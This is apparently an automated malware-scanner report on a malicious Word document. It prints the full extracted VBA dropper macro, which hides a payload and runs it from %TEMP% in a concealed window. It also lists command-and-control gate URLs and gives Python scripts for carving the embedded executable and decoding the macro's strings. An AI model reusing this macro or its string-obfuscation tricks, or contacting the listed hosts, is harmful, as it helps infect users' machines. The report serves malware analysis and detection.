Verdict: MALICIOUS
Risk score: 754

Malware Insights

MITRE ATT&CK
- T1204.002 User Execution: Malicious File
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1105 Ingress Tool Transfer
- T1203 Exploitation for Client Execution
The sample is a Microsoft Word (OLE/CFB) document carrying a VBA project with AutoOpen, Auto_Open and Workbook_Open entry points. The macro is a dropper rather than a downloader: it assembles its strings piecewise to defeat keyword scanning ("T" & "EM" & "P" for the environment variable, Chr(92) for the path separator, Chr(110) to complete the ProgID Word.Application), saves the active document into %TEMP% as byfe.rtf and jwud.rtf (ActiveDocument.SaveAs with FileFormat:=6, wdFormatRTF), opens byfe.rtf in a second, hidden Word instance, busy-waits on Timer, and then runs Shell("%TEMP%\s2.tmp", 0). Nothing in the macro writes s2.tmp; the Ole10Native object flagged under Heuristics is the likely vehicle (a Packager object in an RTF is written to %TEMP% when the document is opened), and the carved PE at offset 0x624C (145,332 bytes, SHA-256 fa4a537d…) is the likely content. The static CVE-2008-2244 (MS08-042) match is a heuristic on file layout, not a confirmed exploit, and the T1203 mapping rests on it; see the caveat on that finding. The URLs recovered from the document body (the same /sl/gate.php path on three domains and a Tor2Web .onion.to mirror, plus api.ipify.org) describe the dropped payload's check-in behaviour, not anything the macro itself contacts.
Heuristics (22)

- CVE-2008-2244: Microsoft Word record-parsing payload. Severity: critical. Rule: CVE_2008_2244 (CVE likely). Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244. Caveat: here the "payload in slack" is the carved PE at offset 0x624C, which runs from there to the end of the 170,496-byte file (0x624C = 25,164; 25,164 + 145,332 = 170,496), so the rule is matching the embedded executable, and no corrupted record or shellcode outside that PE is shown on this page. Treat the CVE attribution, and the T1203 mapping that rests on it, as unconfirmed; the verdict does not depend on it.
- OLE with Ole10Native: possible CVE-2026-21514 exploitation. Severity: high. Rule: CVE_2026_21514 (CVE likely). Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation. Caveat: an Ole10Native (Packager) object wrapping a PE is also exactly what a non-exploit dropper needs, and the macro's behaviour (save as RTF, reopen hidden, run %TEMP%\s2.tmp) is consistent with the package being written to %TEMP% on open rather than with a parser bug.
- ClamAV: Doc.Macro.ObfuscatedChr-6203136-0. Severity: critical. Rule: CLAMAV_DETECTION. ClamAV detected this file as malware; the signature name indicates the Chr()-built strings in the macro, e.g. Chr(102 + 8) and FygGr(3 + 90 + sts).
- Reference to WriteProcessMemory API. Severity: critical. Rule: SC_STR_WRITEPROCESSMEMORY.
- Embedded PE executable. Severity: critical. Rule: OLE_EMBEDDED_EXE. MZ/PE header found inside document; carved as embedded_office_0000624c.exe (offset 0x624C, 145,332 bytes) under Extracted artifacts.
- VBA macros detected. Severity: medium (7 related findings). Rule: OLE_VBA_MACROS. Document contains VBA macro code.
- Potential Shell call in VBA. Severity: critical. Rule: OLE_VBA_SHELL. Matched line in script (Module1.Girow):
  Dim hhf As Variant
  hhf = Shell(uyt, 0)
  End Function
  Girow is called from Lashature as Module1.Girow(WOIEW), where WOIEW is Environ("TEMP") & "\" & "s2" & ".tmp"; window style 0 hides the launched process's window.
- CreateObject call. Severity: high. Rule: OLE_VBA_CREATEOBJ. Matched line in script:
  Set meLaTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
  BHJASD = Chr(102 + 8) = "n", so the ProgID is Word.Application; the HUIQWD assignments surrounding it are dead stores.
- VBA p-code auto-exec with execution tokens. Severity: high. Rule: OLE_VBA_PCODE_AUTOEXEC_EXEC. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro. Severity: low. Rule: OLE_VBA_AUTOOPEN. Matched line in script: Sub AutoOpen() (calls GhbGGbv, which calls Lashature).
- Workbook_Open macro. Severity: low. Rule: OLE_VBA_WBOPEN. Matched line in script: Sub Workbook_Open() (calls GhbGGbv; Workbook_Open is an Excel event handler and does not fire in Word).
- Auto_Open macro. Severity: low. Rule: OLE_VBA_AUTO. Matched line in script: Sub Auto_Open() (calls Lashature directly).
- Environ() call (env variable access). Severity: low. Rule: OLE_VBA_ENVIRON. Matched line in script:
  TTGDFW = FygGr(3 + 90 + sts)
  DBDDW = Environ(TYGE) + TTGDFW
  JIEKR = "." & "tmp" & ""
  TYGE is "TEMP" and sts is -1, so FygGr(92) is "\" and DBDDW is %TEMP%\ with a trailing separator.
- PEB access via FS segment (x86). Severity: high. Rule: SC_PEB_ACCESS. Attempted x86 opcode disassembly:

```text
00006C59 648b5230      mov edx, dword ptr fs:[edx + 0x30]
00006C5D 2006          and byte ptr [esi], al
00006C5F 0c79          or al, 0x79
00006C61 1401          adc al, 1
00006C63 7228          jb 0x6c8d
00006C65 6a18          push 0x18
00006C67 59            pop ecx
00006C68 33ff          xor edi, edi
00006C6A c8c0ac00      enter -0x5340, 0
00006C6E 3c61          cmp al, 0x61
00006C70 7c02          jl 0x6c74
00006C72 2c20          sub al, 0x20
00006C74 c1cf00        ror edi, 0
00006C77 0d03f8e2f0    or eax, 0xf0e2f803
00006C7C 81ff5b03bc4a  cmp edi, 0x4abc035b
00006C82 6a8b          push -0x75
00006C84 5a            pop edx
00006C85 10981275dbee  adc byte ptr [eax - 0x11248aee], bl
00006C8B c3            ret
00006C8C 058944241c    add eax, 0x1c244489
00006C91 61            popal
00006C92 234455f0      and eax, dword ptr [ebp + edx*2 - 0x10]
00006C96 ec            in al, dx
00006C97 51            push ecx
00006C98 53            push ebx
00006C99 1d565760cf    sbb eax, 0xcf605756
00006C9E 7508          jne 0x6ca8
00006CA0 46            inc esi
00006CA1 7d0c          jge 0x6caf
00006CA3 9a3dc94937d17c lcall 0x7cd1, 0x3749c93d
00006CAA 70db          jo 0x6c87
00006CAC ac            lodsb al, byte ptr [esi]
00006CAD 32c1          xor al, cl
00006CAF 398acd3aea01  cmp dword ptr [edx + 0x1ea3acd], ecx
00006CB5 d6            salc
00006CB6 b608          mov dh, 8
00006CB8 66            .byte 0x66
```

  Offset 0x6C59 lies inside the carved PE (0x624C to end of file), so this code belongs to the dropped executable, not to a separate shellcode blob in OLE slack. The decode is only partly aligned: enter -0x5340, 0; in al, dx; salc and lcall are what linear disassembly from a mid-instruction start produces, and ror edi with a count of 0 is another sign of it. Inside the noise, cmp al, 0x61; jl; sub al, 0x20; ror edi followed by cmp edi, 0x4abc035b (with lodsb a few bytes on) is the recognisable shape of a case-folding rotate-and-add hash loop over exported names compared against a hard-coded target hash, i.e. an API resolver that walks the PEB module list instead of using an import table. That is consistent with the API names below appearing only as string references.
- Reference to CreateProcess API. Severity: high. Rule: SC_STR_CREATEPROCESS.
- Reference to LoadLibrary API. Severity: high. Rule: SC_STR_LOADLIBRARY.
- Reference to GetProcAddress API. Severity: high. Rule: SC_STR_GETPROCADDRESS.
- OLE document has large unaccounted-for region. Severity: high. Rule: OLE_SLACK_ANOMALY. OLE file is 170,496 bytes but its declared streams total only 43,787 bytes; 126,709 bytes (74%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Caveat: the carved PE occupies the tail of the file from 0x624C (25,164) to EOF, 145,332 bytes, which is more than the entire slack region, so the unallocated sectors here hold a plain MZ/PE image rather than encoded shellcode, and the remaining 18,623 bytes of the PE must overlap declared stream sectors (an Ole10Native stream is the obvious candidate).
- Suspicious extracted artifact. Severity: high. Rule: EXTRACTED_FILE_STATIC_TRIAGE. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Reference to VirtualAlloc API. Severity: medium. Rule: SC_STR_VIRTUALALLOC.
- Legacy WordBasic auto-exec macro marker. Severity: medium. Rule: OLE_LEGACY_WORDBASIC_AUTOEXEC. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: the rule's premise does not hold for this sample, since olevba did recover a VBA project (macros.bas); the marker it keyed on is the AutoOpen name already reported by OLE_VBA_AUTOOPEN, so this finding adds nothing.
- Embedded URL. Severity: info. Rule: EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://hadfanawass.com/sl/gate.php (in document text, OLE body)
  - http://rophenreswi.ru/sl/gate.php (in document text, OLE body)
  - http://mihesfitons.ru/sl/gate. (in document text, OLE body; truncated in the extracted report)
  - https://krrewiaog3u4npcg.onion.to/sl/gate.php (in document text, OLE body; .onion.to is a Tor2Web gateway, so this reaches the hidden service krrewiaog3u4npcg.onion over plain HTTPS)
  - http://api.ipify.org (in document text, OLE body; a public external-IP lookup service, commonly called by payloads to learn the victim's public address)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; a standard DrawingML XML namespace, benign)
  The four /sl/gate.php URLs share one path, the pattern of a single check-in endpoint mirrored across domains. The macro source contains no URL, so these strings most likely come from the embedded PE, which is what the "OLE body" label is pointing at.
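The two structural findings above (OLE_SLACK_ANOMALY and OLE_EMBEDDED_EXE) can be reproduced without the vendor tool. The script below is an added example written for this page, not part of the report or of the analyzer that produced it: carve_pe walks every MZ candidate, validates the PE signature and sizes the image from its section table, and slack_summary relates the slack figure to the carved PE using the report's own numbers (170,496-byte file, 43,787 declared stream bytes, PE at 0x624C of 145,332 bytes). The input blob is constructed here (CFB magic, zero-filled sectors, then a hand-built minimal PE) because the sample itself is not on the page; the stream total is taken from the report rather than parsed, since walking the CFB directory is outside what this example demonstrates.

```python
import struct

SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HEADER = struct.Struct("<HHIIIHH")          # IMAGE_FILE_HEADER, 20 bytes


def carve_pe(data: bytes):
    """Return [(offset, size_on_disk)] for every MZ/PE image found in data.

    size_on_disk comes from the section table (headers plus the furthest
    PointerToRawData + SizeOfRawData), so an overlay appended after the last
    section is not counted; compare with len(data) - offset to see whether the
    image runs to end of file, as it does in the report (0x624C + 145332 == EOF).
    """
    hits = []
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            nt = pos + e_lfanew
            if (e_lfanew >= 0x40 and nt + 4 + COFF_HEADER.size <= len(data)
                    and data[nt:nt + 4] == b"PE\0\0"):
                _, nsec, _, _, _, opt_size, _ = COFF_HEADER.unpack_from(data, nt + 4)
                sect_tbl = nt + 4 + COFF_HEADER.size + opt_size
                end = sect_tbl + SECTION_HEADER.size * nsec      # at least the headers
                if end <= len(data):
                    for i in range(nsec):
                        fields = SECTION_HEADER.unpack_from(data, sect_tbl + SECTION_HEADER.size * i)
                        raw_size, raw_ptr = fields[3], fields[4]  # SizeOfRawData, PointerToRawData
                        end = max(end, pos + raw_ptr + raw_size)
                    hits.append((pos, end - pos))
        pos = data.find(b"MZ", pos + 1)
    return hits


def slack_summary(file_size: int, declared_stream_bytes: int, pe_offset: int, pe_size: int) -> dict:
    """Relate the OLE slack finding to the carved PE (numbers as reported by the analyzer)."""
    slack = file_size - declared_stream_bytes
    return {
        "slack_bytes": slack,
        "slack_pct": round(100.0 * slack / file_size, 1),
        "pe_reaches_eof": pe_offset + pe_size == file_size,
        # A PE larger than the slack cannot live entirely in unallocated sectors:
        # part of it must overlap a declared stream.
        "pe_exceeds_slack": pe_size > slack,
    }


def build_fake_pe(code: bytes = b"\x90" * 64) -> bytes:
    """Hand-built minimal PE (constructed): DOS stub with e_lfanew, COFF header, one section."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    # i386, one section, no optional header, IMAGE_FILE_EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = b"PE\0\0" + COFF_HEADER.pack(0x14C, 1, 0, 0, 0, 0, 0x0102)
    raw_ptr = len(dos) + len(coff) + SECTION_HEADER.size
    text = SECTION_HEADER.pack(b".text", len(code), 0x1000, len(code), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + coff + text + code


# Constructed stand-in for the sample: CFB magic, zero-filled "sectors", then the PE at offset 304.
CONSTRUCTED_BLOB = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 296 + build_fake_pe()

if __name__ == "__main__":
    print(carve_pe(CONSTRUCTED_BLOB))                      # [(304, 192)]
    print(slack_summary(170496, 43787, 0x624C, 145332))    # slack 126709 bytes, 74.3%, PE reaches EOF
```

Run against the real file, carve_pe(open(path, "rb").read()) should return a single hit at 0x624C; if the section-table size is smaller than 145,332, the difference is overlay data the analyzer carved along with the image.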
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3013 bytes | 69452a6c0f0153b2d6952895828b7e4cd9b244c637f2f0363df168e566d224d3 |
| embedded_office_0000624c.exe | embedded-pe | Office MZ+PE at offset 0x624C | 145332 bytes | fa4a537de730d9492019ce588a6c1712ef2d8444973f40dbc805c9933a2532c5 |

macros.bas: preview of the extracted script (first 1,000 lines)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
VBJHQWD = "12kj12vhg12" & ";12[]1l '1"
GhbGGbv
End Sub
Sub Workbook_Open()
GhbGGbv
End Sub
Sub GhbGGbv()
Lashature
End Sub
Sub Lashature()
Dim bbgd As Boolean, sts As Integer, YGEW As String
VBHJQW = "1h2jben1v"
sts = -42 + 41
TYGE = "T" & "EM" & ""
TYGE = TYGE & "P"
bbgd = False
On Error Resume Next
Dim WOIEW As String
TTGDFW = FygGr(3 + 90 + sts)
DBDDW = Environ(TYGE) + TTGDFW
JIEKR = "." & "tmp" & ""
FFDRRF = "" & ".rtf"
LQWDO = DBDDW
FFFNNNF = LQWDO + "byfe" + FFDRRF
SSHHDD = DBDDW & "jwud" + FFDRRF
WOIEW = DBDDW & "" & "s2" & JIEKR
FssGeww (FFFNNNF)
FssGeww (SSHHDD)
Module1.Tyryka (2)
BHJASD = Chr(102 + 8)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
Set meLaTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
meLaTure.Visible = bbgd
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
meLaTure.Documents.Open (FFFNNNF)
Module1.Tyryka (2)
HYUASGD = Module1.Girow(WOIEW)
Module1.Tyryka (3)
meLaTure.Quit
Set meLaTure = Nothing
End Sub
Public Function FygGr(wbrw As Integer)
FygGr = Chr(wbrw)
End Function
Public Function FssGeww(vnhe As String)
ActiveDocument.SaveAs FileName:=vnhe, FileFormat:=5 + 1
End Function
Public Function TYGEvs()
TYGEvs = "T" & "EM"
End Function
Sub Auto_Open()
Lashature
End Sub
Attribute VB_Name = "Module1"
Sub Tyryka(Lknd As Long)
bfh = 53
Dim Khge As Long, Rtge As Long
Rtge = Lknd + Timer
Khge = Rtge
Do While Timer < Khge
vhue = 64 * 3 * 4 * 1 * 1 * 3 * 1
Loop
bfhre = 93 + 1
VAYTWGD = ";l1k23 ;l12" & "12j"
TWQYJDA = "'1;2l '12;"
BFHJASD = "1h2jkh32121"
End Sub
Public Function Girow(uyt As String)
Dim hhf As Variant
hhf = Shell(uyt, 0)
End Function
```

How the macro runs: AutoOpen and Auto_Open both reach Lashature (Workbook_Open is an Excel event and is inert in Word). Lashature builds every sensitive string piecewise: TYGE becomes "TEMP"; FygGr(3 + 90 + sts) with sts = -1 is Chr(92) = "\", so DBDDW is %TEMP%\; FFFNNNF and SSHHDD are %TEMP%\byfe.rtf and %TEMP%\jwud.rtf; WOIEW is %TEMP%\s2.tmp; BHJASD = Chr(110) = "n" completes "Word.Application". FssGeww saves the open document to both RTF paths (FileFormat 5 + 1 = 6, wdFormatRTF). After a two-second Timer loop (Tyryka), a second Word instance is created with Visible = False and opens byfe.rtf; after another two seconds Girow runs Shell(WOIEW, 0), executing %TEMP%\s2.tmp with a hidden window; three seconds later the hidden instance is quit. Nothing in the macro writes s2.tmp, so it has to appear as a side effect of opening the RTF copy in the second instance; the Ole10Native object reported under Heuristics, which is where the carved PE lives, is the candidate. The repeated HUIQWD, VBJHQW and VBHJQW assignments and the arithmetic in Tyryka are dead code added as noise, and On Error Resume Next keeps the chain going if any step fails.

embedded_office_0000624c.exe: detection results for this carved file. The carve runs from 0x624C (25,164) to the end of the 170,496-byte sample (25,164 + 145,332 = 170,496).

- ClamAV: no threats found on this executable (the Doc.Macro.ObfuscatedChr-6203136-0 hit under Heuristics is on the parent document's macro, not on this file).
- Obfuscation or payload: likely.
- Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_GETPROCADDRESS, SC_STR_CREATEPROCESS.
- Recovered API/import strings: kernel32.dll, KERNEL32.DLL, GetProcAddress, OpenProcess, VirtualAlloc, VirtualAllocEx. Together with the WriteProcessMemory and CreateProcess references in the Heuristics list, this is the API set for writing code into another process, so expect injection behaviour when the payload runs.
- Carved macro source contains an auto-exec entry point and execution/download terms.
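The string-building in Lashature can be replayed mechanically instead of by hand. The script below is an added example written for this page, not part of the report or of oletools: it implements the small subset of VBA expression syntax the macro uses (string literals, & and + concatenation, Chr() and the macro's own FygGr() alias for it, Environ()) and replays the assignments in execution order to recover the dropped-file paths and the ProgID. The %TEMP% value is a constructed stand-in for whatever the variable resolves to on a victim host; the assignment list is copied from the carved source above with the dead-store decoy lines (HUIQWD, VBJHQW, VBHJQW) omitted. The evaluator parses expressions rather than hard-coding this sample's strings, so it runs unchanged on the same Chr-and-concatenate idiom in other macros.

```python
import re

# Constructed environment for the walkthrough (the real value is the victim's %TEMP%).
CONSTRUCTED_ENV = {"TEMP": r"C:\Users\victim\AppData\Local\Temp"}

# FygGr is the macro's one-line wrapper around Chr(), so treat both the same way.
CHR_FUNCS = {"chr", "fyggr"}


def split_concat(expr: str):
    """Split a VBA expression on top-level & and + (outside quotes and parentheses)."""
    parts, cur, depth, in_str = [], "", 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch in "&+" and depth == 0:
                parts.append(cur.strip())
                cur = ""
                continue
        cur += ch
    parts.append(cur.strip())
    return parts


def eval_int(expr: str, vars_: dict) -> int:
    """Evaluate integer literals joined by + and -, substituting known integer variables."""
    expr = re.sub(r"[A-Za-z_]\w*", lambda m: str(vars_[m.group(0)]), expr)
    if not re.fullmatch(r"[\d\s+\-]+", expr):
        raise ValueError(f"unsupported integer expression: {expr!r}")
    return sum(int(tok.replace(" ", "")) for tok in re.findall(r"[+-]?\s*\d+", expr))


def eval_str(expr: str, vars_: dict) -> str:
    """Evaluate a string expression built from literals, variables, Chr()/FygGr() and Environ()."""
    out = []
    for term in split_concat(expr):
        call = re.fullmatch(r"(\w+)\s*\((.*)\)", term, re.S)
        if len(term) >= 2 and term[0] == term[-1] == '"':
            out.append(term[1:-1].replace('""', '"'))          # string literal
        elif call and call.group(1).lower() in CHR_FUNCS:
            out.append(chr(eval_int(call.group(2), vars_)))     # Chr(n) / FygGr(n)
        elif call and call.group(1).lower() == "environ":
            out.append(CONSTRUCTED_ENV.get(eval_str(call.group(2), vars_), ""))
        elif term in vars_:
            out.append(str(vars_[term]))                        # previously assigned variable
        else:
            raise ValueError(f"unresolved term: {term!r}")
    return "".join(out)


# Assignments copied from Lashature in execution order, decoy dead stores omitted.
MACRO_ASSIGNMENTS = [
    ("sts", "-42 + 41", int),
    ("TYGE", '"T" & "EM" & ""', str),
    ("TYGE", 'TYGE & "P"', str),
    ("TTGDFW", "FygGr(3 + 90 + sts)", str),
    ("DBDDW", "Environ(TYGE) + TTGDFW", str),
    ("JIEKR", '"." & "tmp" & ""', str),
    ("FFDRRF", '"" & ".rtf"', str),
    ("LQWDO", "DBDDW", str),
    ("FFFNNNF", 'LQWDO + "byfe" + FFDRRF', str),
    ("SSHHDD", 'DBDDW & "jwud" + FFDRRF', str),
    ("WOIEW", 'DBDDW & "" & "s2" & JIEKR', str),
    ("BHJASD", "Chr(102 + 8)", str),
    ("progid", '"W" & "" & "or" & "d." & "Applicatio" & BHJASD', str),
]


def resolve_macro(assignments=MACRO_ASSIGNMENTS) -> dict:
    """Replay the assignments and return every variable's final value."""
    vars_ = {}
    for name, expr, kind in assignments:
        vars_[name] = eval_int(expr, vars_) if kind is int else eval_str(expr, vars_)
    return vars_


def decoded_iocs() -> dict:
    """The indicators an analyst wants out of this macro, keyed by the role each plays."""
    v = resolve_macro()
    return {
        "com_object": v["progid"],                    # CreateObject target
        "saveas_rtf": [v["FFFNNNF"], v["SSHHDD"]],    # ActiveDocument.SaveAs, FileFormat 6 = RTF
        "reopened_hidden": v["FFFNNNF"],              # meLaTure.Documents.Open
        "shell_target": v["WOIEW"],                   # Module1.Girow -> Shell(uyt, 0)
    }


if __name__ == "__main__":
    for role, value in decoded_iocs().items():
        print(f"{role:16} {value}")
```

The output gives the file names to search for in %TEMP% on a suspected host (byfe.rtf, jwud.rtf, s2.tmp) and the hidden-window Shell target, which is what a detection rule on Word spawning an executable from %TEMP% should key on.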